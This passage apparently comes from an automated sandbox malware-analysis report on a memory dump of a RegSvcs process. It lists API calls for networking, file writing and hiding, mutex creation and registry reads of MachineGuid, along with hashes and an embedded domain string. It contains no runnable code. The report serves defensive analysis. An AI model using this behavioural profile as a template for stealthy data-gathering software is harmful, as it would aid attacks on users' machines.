                                                                                    APIs
                                                                                    • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                                                                    • socket.WS2_32(?,?,?), ref: 00404E7A
                                                                                    • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: freeaddrinfogetaddrinfosocket
                                                                                    • String ID:
                                                                                    • API String ID: 2479546573-0
                                                                                    • Opcode ID: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                                                                                    • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                                                                    • Opcode Fuzzy Hash: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                                                                                    • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 556 4040bb-4040f2 call 4031e5 CreateFileW 559 4040f8-404111 call 4031e5 556->559 560 40418d-404190 556->560 571 404113-404119 559->571 572 40417a 559->572 562 404192-4041a7 call 403c90 560->562 563 404184 560->563 562->563 568 4041a9-4041b8 call 403c59 562->568 565 404186-40418c 563->565 576 4041ba-4041d8 call 4040bb call 403d44 568->576 577 4041db-4041e4 call 402bab 568->577 571->572 575 40411b-404120 571->575 574 40417d-40417e call 403c40 572->574 583 404183 574->583 579 404122 575->579 580 404124-404140 call 4031e5 VirtualAlloc 575->580 576->577 577->565 579->580 580->572 589 404142-40415e call 4031e5 ReadFile 580->589 583->563 589->574 593 404160-404178 call 4031e5 589->593 593->574
                                                                                    APIs
                                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                                                                                    • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$AllocCreateReadVirtual
                                                                                    • String ID: .tmp
                                                                                    • API String ID: 3585551309-2986845003
                                                                                    • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                                                                    • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                                                                                    • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                                                                    • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                                                                                    APIs
                                                                                    • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                                                                    • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                                                                    • GetLastError.KERNEL32 ref: 0041399E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Error$CreateLastModeMutex
                                                                                    • String ID:
                                                                                    • API String ID: 3448925889-0
                                                                                    • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                                                                    • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                                                                    • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                                                                    • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                                                                                    APIs
                                                                                    • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                                                                                    • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$CreatePointerWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3672724799-0
                                                                                    • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                                                                    • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                                                                                    • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                                                                    • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                                                                                    APIs
                                                                                    • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                                                                                      • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                                                                                      • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                                                                      • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$CreateFreeProcessThread_wmemset
                                                                                    • String ID: ckav.ru
                                                                                    • API String ID: 2915393847-2696028687
                                                                                    • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                                                                    • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                                                                                    • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                                                                    • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                                                                                    APIs
                                                                                      • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                                                      • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                                                    • _wmemset.LIBCMT ref: 0040634F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocateProcess_wmemset
                                                                                    • String ID: CA
                                                                                    • API String ID: 2773065342-1052703068
                                                                                    • Opcode ID: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                                                                                    • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                                                                                    • Opcode Fuzzy Hash: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                                                                                    • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                                                                                    APIs
                                                                                    • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InformationToken
                                                                                    • String ID: IDA
                                                                                    • API String ID: 4114910276-365204570
                                                                                    • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                                                                    • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                                                                                    • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                                                                    • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                                                                                    APIs
                                                                                    • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc
                                                                                    • String ID: s1@
                                                                                    • API String ID: 190572456-427247929
                                                                                    • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                                                                    • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                                                                                    • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                                                                    • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                                                                                    APIs
                                                                                      • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                                                      • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                                                    • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                                                                    • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocateOpenProcessQueryValue
                                                                                    • String ID:
                                                                                    • API String ID: 1425999871-0
                                                                                    • Opcode ID: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                                                                                    • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                                                                    • Opcode Fuzzy Hash: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                                                                                    • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                                                                                    APIs
                                                                                    • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CheckMembershipToken
                                                                                    • String ID:
                                                                                    • API String ID: 1351025785-0
                                                                                    • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                                                                    • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                                                                                    • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                                                                    • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                                                                                    APIs
                                                                                    • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateDirectory
                                                                                    • String ID:
                                                                                    • API String ID: 4241100979-0
                                                                                    • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                                                                    • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                                                                                    • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                                                                    • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                                                                                    APIs
                                                                                    • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InfoNativeSystem
                                                                                    • String ID:
                                                                                    • API String ID: 1721193555-0
                                                                                    • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                                                                    • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                                                                                    • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                                                                    • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                                                                                    APIs
                                                                                    • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: send
                                                                                    • String ID:
                                                                                    • API String ID: 2809346765-0
                                                                                    • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                                                                    • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                                                                                    • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                                                                    • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                                                                                    APIs
                                                                                    • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileMove
                                                                                    • String ID:
                                                                                    • API String ID: 3562171763-0
                                                                                    • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                                                                    • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                                                                                    • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                                                                    • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                                                                                    APIs
                                                                                    • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Startup
                                                                                    • String ID:
                                                                                    • API String ID: 724789610-0
                                                                                    • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                                                                    • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                                                                    • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                                                                    • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                                                                                    APIs
                                                                                    • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                                                                    • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                                                                                    • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                                                                    • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                                                                                    APIs
                                                                                    • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Open
                                                                                    • String ID:
                                                                                    • API String ID: 71445658-0
                                                                                    • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                                                                    • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                                                                                    • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                                                                    • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                                                                                    APIs
                                                                                    • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: DeleteFile
                                                                                    • String ID:
                                                                                    • API String ID: 4033686569-0
                                                                                    • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                                                                    • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                                                                                    • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                                                                    • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID:
                                                                                    • API String ID: 1029625771-0
                                                                                    • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                                                                    • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                                                                    • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                                                                    • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                                                                                    APIs
                                                                                    • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseFind
                                                                                    • String ID:
                                                                                    • API String ID: 1863332320-0
                                                                                    • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                                                                    • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                                                                                    • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                                                                    • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                                                                    • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                                                                                    • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                                                                    • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                                                                                    APIs
                                                                                    • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID:
                                                                                    • API String ID: 3535843008-0
                                                                                    • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                                                                    • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                                                                    • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                                                                    • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                                                                    APIs
                                                                                    • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExistsFilePath
                                                                                    • String ID:
                                                                                    • API String ID: 1174141254-0
                                                                                    • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                                                                    • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                                                                                    • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                                                                    • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                                                                                    APIs
                                                                                    • closesocket.WS2_32(00404EB0), ref: 00404DEB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: closesocket
                                                                                    • String ID:
                                                                                    • API String ID: 2781271927-0
                                                                                    • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                                                                    • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                                                                                    • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                                                                    • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                                                                                    APIs
                                                                                    • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FreeVirtual
